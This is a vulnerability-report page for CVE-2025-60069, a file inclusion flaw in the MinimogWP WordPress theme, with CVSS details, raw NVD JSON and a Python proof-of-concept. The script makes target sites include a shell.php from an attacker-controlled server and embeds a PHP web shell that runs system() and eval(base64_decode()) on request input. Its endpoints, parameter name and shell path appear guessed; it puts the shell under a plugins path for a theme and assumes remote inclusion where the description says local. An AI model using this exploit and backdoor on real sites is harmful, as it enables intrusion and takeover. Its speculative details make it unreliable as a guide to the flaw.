Security Vulnerability Report
中文
CVE-2025-60069 CVSS 8.1 HIGH

CVE-2025-60069

Published: 2025-12-18 08:16:07
Last Modified: 2026-04-27 16:16:31

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove MinimogWP minimog allows PHP Local File Inclusion.This issue affects MinimogWP: from n/a through <= 3.9.6.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:thememove:minimogwp:*:*:*:*:*:wordpress:*:* - VULNERABLE
MinimogWP theme <= 3.9.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60069 MinimogWP Remote File Inclusion PoC # Affected: MinimogWP theme <= 3.9.6 # Type: Remote File Inclusion (RFI) import requests import argparse def exploit_rfi(target_url, attacker_server, param_name='file'): """ Exploit RFI vulnerability in MinimogWP theme target_url: Target WordPress site URL attacker_server: Attacker's server hosting malicious PHP file param_name: Parameter name used for file inclusion """ # Malicious PHP payload to be hosted on attacker server malicious_payload = '''<?php // Shell command execution if(isset($_GET['cmd'])) { system($_GET['cmd']); } // Create backdoor if(isset($_GET['backdoor'])) { eval(base64_decode($_GET['backdoor'])); } ?>''' print(f"[*] Target: {target_url}") print(f"[*] Attacker Server: {attacker_server}") print(f"[*] Payload saved on: {attacker_server}/shell.php") # Common MinimogWP AJAX endpoints endpoints = [ '/wp-admin/admin-ajax.php', '/wp-admin/admin.php?page=minimog-settings', '/?minimog-ajax=1' ] for endpoint in endpoints: full_url = target_url.rstrip('/') + endpoint # Construct RFI payload params = { param_name: f'{attacker_server}/shell.php', 'action': 'minimog_load_template' } try: print(f"\n[*] Testing endpoint: {endpoint}") response = requests.get(full_url, params=params, timeout=10) if response.status_code == 200: print(f"[+] Possible vulnerable endpoint found: {endpoint}") print(f"[+] Response length: {len(response.text)} bytes") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[!] Manual verification needed - check if remote file was included") print(f"[!] Test command execution: {target_url}/wp-content/plugins/minimog/shell.php?cmd=whoami") if __name__ == '__main__': parser = argparse.ArgumentParser(description='CVE-2025-60069 MinimogWP RFI Exploit') parser.add_argument('-t', '--target', required=True, help='Target WordPress URL') parser.add_argument('-s', '--server', required=True, help='Attacker controlled server URL') parser.add_argument('-p', '--param', default='file', help='Parameter name for injection') args = parser.parse_args() exploit_rfi(args.target, args.server, args.param)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60069", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:07.063", "lastModified": "2026-04-27T16:16:31.487", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeMove MinimogWP minimog allows PHP Local File Inclusion.This issue affects MinimogWP: from n/a through <= 3.9.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:thememove:minimogwp:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "3.9.6", "matchCriteriaId": "7A3E0108-DF4D-4BE3-AA1B-3FD4D0448197"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/minimog/vulnerability/wordpress-minimogwp-theme-3-9-2-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}